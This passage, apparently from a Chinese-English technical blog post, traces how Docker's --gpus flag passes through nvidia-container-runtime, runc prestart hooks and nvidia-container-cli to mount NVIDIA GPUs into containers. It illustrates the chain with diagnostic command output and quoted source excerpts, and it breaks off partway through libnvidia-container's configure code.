677 652 0:48 /usr/local/cuda-12.6/compat/libcuda.so.560.35.03 /usr/lib/x86_64-linux-gnu/libcuda.so.560.35.03 ro,nosuid,nodev,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/7PESVCWGEYV5EAUFQQOU54JC5I:/var/lib/docker/overlay2/l/PIMQYFKPYMVGLM7JIYDNWWQNMV:/var/lib/docker/overlay2/l/BOOUOLOLY4GM525O7PGZYXHWAR:/var/lib/docker/overlay2/l/JFDVXPNFZHK6MO35W275FXWJK2:/var/lib/docker/overlay2/l/DHPPA554ZRQ3RMXBAC4TCQ2ONI:/var/lib/docker/overlay2/l/7VXIOP6JUX5AQWZDCES4OSMUE3:/var/lib/docker/overlay2/l/VXIMXECSGJPSZSTCV4L3F5SSVF:/var/lib/docker/overlay2/l/GNHB2U3KK74XBRHDNTTRBPLO5V:/var/lib/docker/overlay2/l/CPLKLXQBHMU2HSD2KH7QST3XPC:/var/lib/docker/overlay2/l/5I4CMPNMDVNB4OH6B3LTCLKUX5:/var/lib/docker/overlay2/l/MZVFHZWHWZ6WESPEACUAGYRIW2,upperdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/diff,workdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/work
...
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 nvidia-smi

==========
== CUDA ==
==========

CUDA Version 12.6.2

Container image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.

This container image and its contents are governed by the NVIDIA Deep Learning Container License.
By pulling and using the container, you accept the terms and conditions of this license:
https://developer.nvidia.com/ngc/nvidia-deep-learning-container-license

A copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.

Tue Nov 26 12:40:00 2024       
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 12.6     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   29C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

1.3 CDI

根据"Support for Container Device Interface — NVIDIA Container Toolkit documentation"(https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html#):

从 v1.12.0 版本开始,NVIDIA 容器工具包支持生成容器设备接口(CDI)规范。CDI 是一个开放的容器运行时规范,它抽象了对设备(如 NVIDIA GPU)的访问含义,并在各个容器运行时中标准化了访问方式。流行的容器运行时可以读取并处理这一规范,以确保设备在容器中可用。CDI 简化了对 NVIDIA GPU 等设备的支持添加,因为该规范适用于所有支持 CDI 的容器运行时。

通过分析代码确认,CDI 模式通过将挂载配置、设备直接写入到 oci spec, 而不会执行 nvidia-container-cli configure, 也就不会自行实现挂载了,同时也不支持 cuda 兼容特性。

$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
$ docker run --rm -ti --runtime=nvidia     -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ubuntu cat /proc/self/mountinfo |grep overlay
643 534 0:48 / / rw,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/VWXTSEW55YTGJ23XYVXBZE6TIH:/var/lib/docker/overlay2/l/F3QZDOFKONMKPK4LRXRABM3LRQ,upperdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/diff,workdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/work

1.4 gpu-operator

参考 "官方文档"(https://docs.nvidia.com/datacenter/cloud-native/gpu-operator/latest/getting-started.html), 安装gpu-operator。

gpu-operator 将通过名为 nvidia-container-toolkit-daemonset 的容器,挂载主机目录,将 nvidia-container-toolkit 安装到主机的 /usr/local/nvidia 目录。

$ kubectl --kubeconfig wanglei-k8s-gpu-kubeconfig.yaml describe pod -n gpu-operator nvidia-container-toolkit-daemonset-fzznt
Name:                 nvidia-container-toolkit-daemonset-fzznt
Namespace:            gpu-operator
Priority:             2000001000
Priority Class Name:  system-node-critical
Node:                 10.0.2.70/10.0.2.70
Start Time:           Thu, 28 Nov 2024 21:00:54 +0800
Labels:               app=nvidia-container-toolkit-daemonset
                      app.kubernetes.io/managed-by=gpu-operator
                      controller-revision-hash=5798fb59f4
                      helm.sh/chart=gpu-operator-v24.9.0
                      pod-template-generation=1
Annotations:          <none>
Status:               Running
IP:                   172.16.0.146
IPs:
  IP:           172.16.0.146
Controlled By:  DaemonSet/nvidia-container-toolkit-daemonset
Init Containers:
  driver-validation:
    Container ID:  containerd://0b6689ed6d9dc8c9103934a900a865faf4fc2604356097b3b151e9b5ffb28310
    Image:         nvcr.io/nvidia/cloud-native/gpu-operator-validator:v24.9.0
    Image ID:      nvcr.io/nvidia/cloud-native/gpu-operator-validator@sha256:70a0bd29259820d6257b04b0cdb6a175f9783d4dd19ccc4ec6599d407c359ba5
    Port:          <none>
    Host Port:     <none>
    Command:
      sh
      -c
    Args:
      nvidia-validator
    State:          Terminated
      Reason:       Completed
      Exit Code:    0
      Started:      Thu, 28 Nov 2024 21:00:55 +0800
      Finished:     Thu, 28 Nov 2024 21:04:41 +0800
    Ready:          True
    Restart Count:  0
    Environment:
      WITH_WAIT:           true
      COMPONENT:           driver
      OPERATOR_NAMESPACE:  gpu-operator (v1:metadata.namespace)
    Mounts:
      /host from host-root (ro)
      /host-dev-char from host-dev-char (rw)
      /run/nvidia/driver from driver-install-dir (rw)
      /run/nvidia/validations from run-nvidia-validations (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Containers:
  nvidia-container-toolkit-ctr:
    Container ID:  containerd://c236b579e2cd400d98d7a34fb9e4b9037322ad620445da3f1fc91518142ba615
    Image:         nvcr.io/nvidia/k8s/container-toolkit:v1.17.0-ubuntu20.04
    Image ID:      nvcr.io/nvidia/k8s/container-toolkit@sha256:c458c33da393dda19e53dae4cb82f02203714ce0f5358583bf329f3693ec84cb
    Port:          <none>
    Host Port:     <none>
    Command:
      /bin/bash
      -c
    Args:
      /bin/entrypoint.sh
    State:          Running
      Started:      Thu, 28 Nov 2024 21:04:54 +0800
    Ready:          True
    Restart Count:  0
    Environment:
      ...
    Mounts:
      /bin/entrypoint.sh from nvidia-container-toolkit-entrypoint (ro,path="entrypoint.sh")
      /driver-root from driver-install-dir (rw)
      /host from host-root (ro)
      /run/nvidia/toolkit from toolkit-root (rw)
      /run/nvidia/validations from run-nvidia-validations (rw)
      /runtime/config-dir/ from containerd-config (rw)
      /runtime/sock-dir/ from containerd-socket (rw)
      /usr/local/nvidia from toolkit-install-dir (rw)
      /usr/share/containers/oci/hooks.d from crio-hooks (rw)
      /var/run/cdi from cdi-root (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Conditions:
  ...
Volumes:
  nvidia-container-toolkit-entrypoint:
    Type:      ConfigMap (a volume populated by a ConfigMap)
    Name:      nvidia-container-toolkit-entrypoint
    Optional:  false
  toolkit-root:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/toolkit
    HostPathType:  DirectoryOrCreate
  run-nvidia-validations:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/validations
    HostPathType:  DirectoryOrCreate
  driver-install-dir:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/driver
    HostPathType:  DirectoryOrCreate
  host-root:
    Type:          HostPath (bare host directory volume)
    Path:          /
    HostPathType:  
  toolkit-install-dir:
    Type:          HostPath (bare host directory volume)
    Path:          /usr/local/nvidia
    HostPathType:  
  crio-hooks:
    Type:          HostPath (bare host directory volume)
    Path:          /run/containers/oci/hooks.d
    HostPathType:  
  host-dev-char:
    Type:          HostPath (bare host directory volume)
    Path:          /dev/char
    HostPathType:  
  cdi-root:
    Type:          HostPath (bare host directory volume)
    Path:          /var/run/cdi
    HostPathType:  DirectoryOrCreate
  containerd-config:
    Type:          HostPath (bare host directory volume)
    Path:          /etc/containerd
    HostPathType:  DirectoryOrCreate
  containerd-socket:
    Type:          HostPath (bare host directory volume)
    Path:          /run/containerd
    HostPathType:  
...

Watching processes while a GPU container starts confirms that the mounts are still performed through nvidia-container-toolkit:

root@wanglei-k8s-gpu-02862:~# while true; do ps -ef |grep nvidia-container-cli|grep -v grep; done
root       91175   91173  0 21:04 ?        00:00:00 /bin/sh /usr/local/nvidia/toolkit/nvidia-container-cli --root=/run/nvidia/driver --load-kmods configure --ldconfig=@/run/nvidia/driver/sbin/ldconfig.real --device=GPU-1401ffea-de99-b446-2a8c-15e0797f35bb --compat32 --compute --display --graphics --ngx --utility --video --pid=91165 /mnt/paas/runtime/overlay2/332208ab1f6248114caa9ed78edfcfe09cee0ecf6939e46c942b1e4394df65da/merged

2. Call-Chain Analysis

  • nvidia-container-cli (https://github.com/NVIDIA/libnvidia-container/tree/main/src/cli)
  • libnvidia-container (https://github.com/NVIDIA/libnvidia-container)

2.1 docker-cli passes --gpus to the docker daemon

The docker run and docker create commands provide a --gpus flag for specifying which GPU devices to pass to the container. The analysis below follows the docker create path.

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L79

func NewCreateCommand(dockerCli command.Cli) *cobra.Command {
  ...
 cmd := &cobra.Command{
  Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
  Short: "Create a new container",
    ...
  }
  ...
 copts = addFlags(flags)
  ...
}

The --gpus flag is parsed into hostConfig and passed along to the docker daemon.

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L190

func addFlags(flags *pflag.FlagSet) *containerOptions {
  copts := &containerOptions{
    ...
    gpus                opts.GpuOpts
    ...
  }
  ...
  flags.Var(&copts.gpus, "gpus", "GPU devices to add to the container ('all' to pass all GPUs)")
  ...
}

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L593

func parse(flags *pflag.FlagSet, copts *containerOptions, serverOS string) (*containerConfig, error) {
  ...
  deviceRequests := copts.gpus.Value()
  if len(cdiDeviceNames) > 0 {
    cdiDeviceRequest := container.DeviceRequest{
      Driver:    "cdi",
      DeviceIDs: cdiDeviceNames,
    }
    deviceRequests = append(deviceRequests, cdiDeviceRequest)
  }
  resources := container.Resources{
    ...
    DeviceRequests:       deviceRequests,
  }
  ...
  hostConfig := &container.HostConfig{
    ...
    Resources:      resources,
    ...
  }
  ...
return &containerConfig{
    Config:           config,
    HostConfig:       hostConfig,
    NetworkingConfig: networkingConfig,
  }, nil
}

https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L265C2-L265C120

func runCreate(ctx context.Context, dockerCli command.Cli, flags *pflag.FlagSet, options *createOptions, copts *containerOptions) error {
  ...
 containerCfg, err := parse(flags, copts, dockerCli.ServerInfo().OSType)
  ...
 id, err := createContainer(ctx, dockerCli, containerCfg, options)
  ...
}

func createContainer(ctx context.Context, dockerCli command.Cli, containerCfg *containerConfig, options *createOptions) (containerID string, err error) {
  ...
  response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, platform, options.name)
  ...
}

2.2 The docker daemon creates the spec

When the container starts, the daemon creates the OCI spec and adds the prestart hook configuration.

https://github.com/moby/moby/blob/v27.1.0/daemon/start.go#L143C2-L143C65

func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
 ...
 return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true)
}

func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
 ...
 spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts)
 ...
}

https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L1042

func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, err error) {
 ...
 opts = append(opts,
  ...
  WithDevices(daemon, c),
  ...
 )
 ...
}

https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L934-L938

func WithDevices(daemon *Daemon, c *container.Container) coci.SpecOpts {
 return func(ctx context.Context, _ coci.Client, _ *containers.Container, s *coci.Spec) error {
  ...
  for _, req := range c.HostConfig.DeviceRequests {
   if err := daemon.handleDevice(req, s); err != nil {
    return err
   }
  }
  ...
 }
}

https://github.com/moby/moby/blob/v27.1.0/daemon/devices.go#L29

func (daemon *Daemon) handleDevice(req container.DeviceRequest, spec *specs.Spec) error {
if req.Driver == "" {
for _, dd := range deviceDrivers {
   if selected := dd.capset.Match(req.Capabilities); selected != nil {
    return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
   }
  }
 } else if dd := deviceDrivers[req.Driver]; dd != nil {
if req.Driver == "cdi" {
   return dd.updateSpec(spec, &deviceInstance{req: req})
  }
if selected := dd.capset.Match(req.Capabilities); selected != nil {
   return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
  }
 }
return incompatibleDeviceRequest{req.Driver, req.Capabilities}
}

https://github.com/moby/moby/blob/v27.1.0/daemon/nvidia_linux.go#L92-L99

const nvidiaHook = "nvidia-container-runtime-hook"

func init() {
if _, err := exec.LookPath(nvidiaHook); err != nil {
// do not register Nvidia driver if helper binary is not present.
return
 }
 capset := capabilities.Set{"gpu": struct{}{}, "nvidia": struct{}{}}
 nvidiaDriver := &deviceDriver{
  capset:     capset,
  updateSpec: setNvidiaGPUs,
 }
for c := range allNvidiaCaps {
  nvidiaDriver.capset[string(c)] = struct{}{}
 }
 registerDeviceDriver("nvidia", nvidiaDriver)
}

func setNvidiaGPUs(s *specs.Spec, dev *deviceInstance) error {
 req := dev.req
if req.Count != 0 && len(req.DeviceIDs) > 0 {
return errConflictCountDeviceIDs
 }

 if len(req.DeviceIDs) > 0 {
  s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+strings.Join(req.DeviceIDs, ","))
 } else if req.Count > 0 {
  s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+countToDevices(req.Count))
 } else if req.Count < 0 {
  s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES=all")
 }

var nvidiaCaps []string
// req.Capabilities contains device capabilities, some but not all are NVIDIA driver capabilities.
for _, c := range dev.selectedCaps {
  nvcap := nvidia.Capability(c)
if _, isNvidiaCap := allNvidiaCaps[nvcap]; isNvidiaCap {
   nvidiaCaps = append(nvidiaCaps, c)
   continue
  }
// TODO: nvidia.WithRequiredCUDAVersion
// for now we let the prestart hook verify cuda versions but errors are not pretty.
 }

if nvidiaCaps != nil {
  s.Process.Env = append(s.Process.Env, "NVIDIA_DRIVER_CAPABILITIES="+strings.Join(nvidiaCaps, ","))
 }

 path, err := exec.LookPath(nvidiaHook)
if err != nil {
return err
 }

if s.Hooks == nil {
  s.Hooks = &specs.Hooks{}
 }

// This implementation uses prestart hooks, which are deprecated.
// CreateRuntime is the closest equivalent, and executed in the same
// locations as prestart-hooks, but depending on what these hooks do,
// possibly one of the other hooks could be used instead (such as
// CreateContainer or StartContainer).
 s.Hooks.Prestart = append(s.Hooks.Prestart, specs.Hook{ //nolint:staticcheck // FIXME(thaJeztah); replace prestart hook with a non-deprecated one.
  Path: path,
  Args: []string{
   nvidiaHook,
   "prestart",
  },
  Env: os.Environ(),
 })

 return nil
}

After docker finishes preparing the spec, it launches the runtime.

2.3 nvidia-container-runtime invokes runc

When nvidia-container-toolkit is installed, it sets the runtime to nvidia-container-runtime.

nvidia-container-runtime acts as a shim: it passes the spec handed over by docker through to the lower-level runtime, which by default is usually runc.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/config/config.go#L110

func GetDefault() (*Config, error) {
 d := Config{
  ...
  NVIDIAContainerRuntimeConfig: RuntimeConfig{
   ...
   Runtimes:      []string{"docker-runc""runc""crun"},
   ...
  },
  ...
 }
 ...
}

So why does nvidia-container-runtime exist at all? Mainly to modify the spec. This partly overlaps with the prestart hook that docker already injected, but nvidia-container-runtime makes more extensive changes.

Let's trace the complete nvidia-container-runtime call chain.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime/main.go#L11

func main() {
 r := runtime.New()
 err := r.Run(os.Args)
 if err != nil {
  os.Exit(1)
 }
}

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime.go#L82

func (r rt) Run(argv []string) (rerr error) {
 ...
 runtime, err := newNVIDIAContainerRuntime(r.logger, cfg, argv, driver)
 ...
 return runtime.Exec(argv)
}
  • If the command being executed is not create, runc is invoked directly.
  • If it is create, the spec is modified; the modifications include modeModifier, graphicsModifier, and featureModifier.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L49

func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
 lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
 ...
if !oci.HasCreateSubcommand(argv) {
  logger.Tracef("Skipping modifier for non-create subcommand")
return lowLevelRuntime, nil
 }

 ociSpec, err := oci.NewSpec(logger, argv)
 ...
 specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
 ...
// Create the wrapping runtime with the specified modifier.
 r := oci.NewModifyingRuntimeWrapper(
  logger,
  lowLevelRuntime,
  ociSpec,
  specModifier,
 )

return r, nil
}

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/oci/runtime_modifier.go#L56

func (r *modifyingRuntimeWrapper) Exec(args []string) error {
if HasCreateSubcommand(args) {
  r.logger.Debugf("Create command detected; applying OCI specification modifications")
  err := r.modify()
if err != nil {
   return fmt.Errorf("could not apply required modification to OCI specification: %w", err)
  }
  r.logger.Debugf("Applied required modification to OCI specification")
 }

 r.logger.Debugf("Forwarding command to runtime %v", r.runtime.String())
return r.runtime.Exec(args)
}

2.4 What exactly nvidia-container-runtime modifies in the spec

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L66

// newSpecModifier is a factory method that creates constructs an OCI spec modifer based on the provided config.
func newSpecModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec, driver *root.Driver) (oci.SpecModifier, error) {
 rawSpec, err := ociSpec.Load()
 if err != nil {
  return nil, fmt.Errorf("failed to load OCI spec: %v", err)
 }

 image, err := image.NewCUDAImageFromSpec(rawSpec)
 if err != nil {
  return nil, err
 }

 mode := info.ResolveAutoMode(logger, cfg.NVIDIAContainerRuntimeConfig.Mode, image)
 modeModifier, err := newModeModifier(logger, mode, cfg, ociSpec, image)
 if err != nil {
  return nil, err
 }
 // For CDI mode we make no additional modifications.
 if mode == "cdi" {
  return modeModifier, nil
 }

 graphicsModifier, err := modifier.NewGraphicsModifier(logger, cfg, image, driver)
 if err != nil {
  return nil, err
 }

 featureModifier, err := modifier.NewFeatureGatedModifier(logger, cfg, image)
 if err != nil {
  return nil, err
 }

 modifiers := modifier.Merge(
  modeModifier,
  graphicsModifier,
  featureModifier,
 )
 return modifiers, nil
}

There are three kinds of modeModifier.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L105

func newModeModifier(logger logger.Interface, mode string, cfg *config.Config, ociSpec oci.Spec, image image.CUDA) (oci.SpecModifier, error) {
 switch mode {
 case "legacy":
  return modifier.NewStableRuntimeModifier(logger, cfg.NVIDIAContainerRuntimeHookConfig.Path), nil
 case "csv":
  return modifier.NewCSVModifier(logger, cfg, image)
 case "cdi":
  return modifier.NewCDIModifier(logger, cfg, ociSpec)
 }

 return nil, fmt.Errorf("invalid runtime mode: %v", cfg.NVIDIAContainerRuntimeConfig.Mode)
}

If mode is cdi, only the modeModifier is applied. The CDI modifier takes care of the hooks, devices, and mounts configuration in the spec (these are already declared in /etc/cdi/nvidia.yaml).

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/cdi.go#L37

func NewCDIModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec) (oci.SpecModifier, error) {
 devices, err := getDevicesFromSpec(logger, ociSpec, cfg)
 if err != nil {
  return nil, fmt.Errorf("failed to get required devices from OCI specification: %v", err)
 }
 if len(devices) == 0 {
  logger.Debugf("No devices requested; no modification required.")
  return nil, nil
 }
 logger.Debugf("Creating CDI modifier for devices: %v", devices)

 automaticDevices := filterAutomaticDevices(devices)
 if len(automaticDevices) != len(devices) && len(automaticDevices) > 0 {
  return nil, fmt.Errorf("requesting a CDI device with vendor 'runtime.nvidia.com' is not supported when requesting other CDI devices")
 }
 if len(automaticDevices) > 0 {
  automaticModifier, err := newAutomaticCDISpecModifier(logger, cfg, automaticDevices)
  if err == nil {
   return automaticModifier, nil
  }
  logger.Warningf("Failed to create the automatic CDI modifier: %w", err)
  logger.Debugf("Falling back to the standard CDI modifier")
 }

 return cdi.New(
  cdi.WithLogger(logger),
  cdi.WithDevices(devices...),
  cdi.WithSpecDirs(cfg.NVIDIAContainerRuntimeConfig.Modes.CDI.SpecDirs...),
 )
}

The legacy modifier modifies the runc prestart hook:

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/stable.go#L33

func NewStableRuntimeModifier(logger logger.Interface, nvidiaContainerRuntimeHookPath string) oci.SpecModifier {
 m := stableRuntimeModifier{
  logger:                         logger,
  nvidiaContainerRuntimeHookPath: nvidiaContainerRuntimeHookPath,
 }
 return &m
}

The CSV modifier lets the user supply concrete device configuration through CSV files; similar to CDI mode, it directly modifies the devices configuration in the OCI spec.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/csv.go#L42

func NewCSVModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
 if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
  logger.Infof("No modification required; no devices requested")
  return nil, nil
 }
 logger.Infof("Constructing modifier from config: %+v", *cfg)

 if err := checkRequirements(logger, image); err != nil {
  return nil, fmt.Errorf("requirements not met: %v", err)
 }

 csvFiles, err := csv.GetFileList(cfg.NVIDIAContainerRuntimeConfig.Modes.CSV.MountSpecPath)
 if err != nil {
  return nil, fmt.Errorf("failed to get list of CSV files: %v", err)
 }

 if image.Getenv(nvidiaRequireJetpackEnvvar) != "csv-mounts=all" {
  csvFiles = csv.BaseFilesOnly(csvFiles)
 }

 cdilib, err := nvcdi.New(
  nvcdi.WithLogger(logger),
  nvcdi.WithDriverRoot(cfg.NVIDIAContainerCLIConfig.Root),
  nvcdi.WithNVIDIACDIHookPath(cfg.NVIDIACTKConfig.Path),
  nvcdi.WithMode(nvcdi.ModeCSV),
  nvcdi.WithCSVFiles(csvFiles),
 )
 if err != nil {
  return nil, fmt.Errorf("failed to construct CDI library: %v", err)
 }

 spec, err := cdilib.GetSpec()
 if err != nil {
  return nil, fmt.Errorf("failed to get CDI spec: %v", err)
 }

 cdiModifier, err := cdi.New(
  cdi.WithLogger(logger),
  cdi.WithSpec(spec.Raw()),
 )
 if err != nil {
  return nil, fmt.Errorf("failed to construct CDI modifier: %v", err)
 }

 modifiers := Merge(
  nvidiaContainerRuntimeHookRemover{logger},
  cdiModifier,
 )

 return modifiers, nil
}

GraphicsModifier

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/graphics.go#L32

func NewGraphicsModifier(logger logger.Interface, cfg *config.Config, image image.CUDA, driver *root.Driver) (oci.SpecModifier, error) {
 if required, reason := requiresGraphicsModifier(image); !required {
  logger.Infof("No graphics modifier required: %v", reason)
  return nil, nil
 }

 nvidiaCDIHookPath := cfg.NVIDIACTKConfig.Path

 mounts, err := discover.NewGraphicsMountsDiscoverer(
  logger,
  driver,
  nvidiaCDIHookPath,
 )
 if err != nil {
  return nil, fmt.Errorf("failed to create mounts discoverer: %v", err)
 }

 // In standard usage, the devRoot is the same as the driver.Root.
 devRoot := driver.Root
 drmNodes, err := discover.NewDRMNodesDiscoverer(
  logger,
  image.DevicesFromEnvvars(visibleDevicesEnvvar),
  devRoot,
  nvidiaCDIHookPath,
 )
 if err != nil {
  return nil, fmt.Errorf("failed to construct discoverer: %v", err)
 }

 d := discover.Merge(
  drmNodes,
  mounts,
 )
 return NewModifierFromDiscoverer(logger, d)
}

The feature-gated modifier adjusts the device and mount configuration in the OCI spec according to feature switches in the config; when a feature is enabled, the corresponding device or mount entries are added.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/gated.go#L38

// NewFeatureGatedModifier creates the modifiers for optional features.
// These include:
//
// NVIDIA_GDS=enabled
// NVIDIA_MOFED=enabled
// NVIDIA_NVSWITCH=enabled
// NVIDIA_GDRCOPY=enabled
//
// If not devices are selected, no changes are made.
func NewFeatureGatedModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
 if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
  logger.Infof("No modification required; no devices requested")
  return nil, nil
 }

 var discoverers []discover.Discover

 driverRoot := cfg.NVIDIAContainerCLIConfig.Root
 devRoot := cfg.NVIDIAContainerCLIConfig.Root

 if cfg.Features.IsEnabled(config.FeatureGDS, image) {
  d, err := discover.NewGDSDiscoverer(logger, driverRoot, devRoot)
  if err != nil {
   return nil, fmt.Errorf("failed to construct discoverer for GDS devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

 if cfg.Features.IsEnabled(config.FeatureMOFED, image) {
  d, err := discover.NewMOFEDDiscoverer(logger, devRoot)
  if err != nil {
   return nil, fmt.Errorf("failed to construct discoverer for MOFED devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

 if cfg.Features.IsEnabled(config.FeatureNVSWITCH, image) {
  d, err := discover.NewNvSwitchDiscoverer(logger, devRoot)
  if err != nil {
   return nil, fmt.Errorf("failed to construct discoverer for NVSWITCH devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

 if cfg.Features.IsEnabled(config.FeatureGDRCopy, image) {
  d, err := discover.NewGDRCopyDiscoverer(logger, devRoot)
  if err != nil {
   return nil, fmt.Errorf("failed to construct discoverer for GDRCopy devices: %w", err)
  }
  discoverers = append(discoverers, d)
 }

 return NewModifierFromDiscoverer(logger, discover.Merge(discoverers...))
}

2.5 runc invokes nvidia-container-runtime-hook at the prestart hook stage

https://github.com/opencontainers/runc/blob/v1.1.13/libcontainer/process_linux.go#L462

func (p *initProcess) start() (retErr error) {
 ...
 ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {
switch sync.Type {
case procSeccomp:
   ...
case procReady:
   ...
   if err := hooks[configs.Prestart].RunHooks(s); err != nil {
    return err
   }
   ...
case procHooks:
   ...
   if err := hooks[configs.Prestart].RunHooks(s); err != nil {
    return err
   }
   ...
default:
   ...
  }
 }
 ...
}

2.6 nvidia-container-runtime-hook invokes nvidia-container-cli

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L179

func main() {
 ...
 switch args[0] {
 case "prestart":
  doPrestart()
  os.Exit(0)
 case "poststart":
  fallthrough
 case "poststop":
  os.Exit(0)
 default:
  flag.Usage()
  os.Exit(2)
 }
}

It execs the configure command of nvidia-container-cli.

https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L149

func doPrestart() {
 ...
 args := []string{getCLIPath(cli)}
 ...
 args = append(args, "configure")
 ...
 err = syscall.Exec(args[0], args, env)
 ...
}

2.7 nvidia-container-cli invokes libnvidia-container

nvidia-container-cli adds a small indirection: the nvc_ prefix of the functions in libnvidia-container is stripped, and they are invoked through libnvc.xxx instead.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/main.c#L140

int
main(int argc, char *argv[])
{
 ...
        if ((rv = load_libnvc()) != 0)
                goto fail;
 ...
}

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/libnvc.c#L137

int
load_libnvc(void)
{
        if (is_tegra() && !nvml_available())
                return load_libnvc_v0();
        return load_libnvc_v1();
}
...
static int
load_libnvc_v1(void)
{
        #define load_libnvc_func(func) \
            libnvc.func = nvc_##func


        load_libnvc_func(config_free);
        ...
}

nvidia-container-cli configure performs a long series of mount operations:

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/configure.c#L376-L433

int
configure_command(const struct context *ctx)
{
 ...
        if (libnvc.driver_mount(nvc, cnt, drv) < 0) {
                warnx("mount error: %s", libnvc.error(nvc));
                goto fail;
        }
        for (size_t i = 0; i < devices.ngpus; ++i) {
                if (libnvc.device_mount(nvc, cnt, devices.gpus[i]) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
        }
        if (!mig_config_devices.all && !mig_monitor_devices.all) {
                for (size_t i = 0; i < devices.nmigs; ++i) {
